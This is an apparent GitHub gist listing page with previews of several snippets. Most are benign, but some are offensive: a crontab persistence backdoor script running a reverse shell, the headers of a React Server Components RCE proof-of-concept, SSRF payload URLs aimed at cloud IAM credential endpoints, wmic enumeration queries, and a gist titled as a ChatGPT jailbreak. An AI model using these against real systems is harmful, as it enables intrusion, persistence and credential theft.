Skip to content

Instantly share code, notes, and snippets.

View w0ltage's full-sized avatar
:shipit:
hacking myself

Artyom Bulgakov w0ltage

:shipit:
hacking myself
9 followers · 9 following
View GitHub Profile
@maple3142
maple3142 / CVE-2025-55182.http
Last active February 13, 2026 12:02
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active February 10, 2026 19:48
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@whoamins
whoamins / http-headers.txt
Created March 11, 2023 20:58
Host Override Headers
bae-env-addr-bcms:
bae-env-addr-bcs:
bae-env-addr-bus:
bae-env-addr-channel:
bae-env-addr-sql-ip:
bae-env-addr-sql-port:
base-url:
cache_info:
CF-Connecting-IP:
cf-connecting_ip:
@coolaj86
coolaj86 / ChatGPT-Dan-Jailbreak.md
Last active February 17, 2026 21:51
@wcarhart
wcarhart / bash_tidbits.md
Last active October 16, 2025 13:51
Helpful Bash design patterns

Helpful Bash tidbits

@AnatomicJC
AnatomicJC / android-backup-apk-and-datas.md
Last active February 16, 2026 19:10
Backup android app, data included, no root needed, with adb

Backup android app, data included, no root needed, with adb

Note: This gist may be outdated, thanks to all contributors in comments.

adb is the Android CLI tool with which you can interact with your android device, from your PC

You must enable developer mode (tap 7 times on the build version in parameters) and install adb on your PC.

Don't hesitate to read comments, there is useful tips, thanks guys for this !

@hoefler02
hoefler02 / persistence.sh
Last active December 12, 2025 01:22
Persistent Reverse Shell via Crontab
#!/bin/bash
# persistent reverse shell backdoor via crontab
# overwrites existing crontabs
(touch .tab ; echo "* * * * * reverse-shell-of-choice" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1
# keeps existing crontabs
(crontab -l > .tab ; echo "* * * * * reverse-shell-of-choice" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1
@asukakenji
asukakenji / 0-go-os-arch.md
Last active February 14, 2026 09:48
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.17.1 darwin/amd64.

GOOS Values

GOOS Out of the Box
aix
android
@xorrior
xorrior / wmic_cmds.txt
Last active February 18, 2026 05:00
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active January 22, 2026 16:44
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]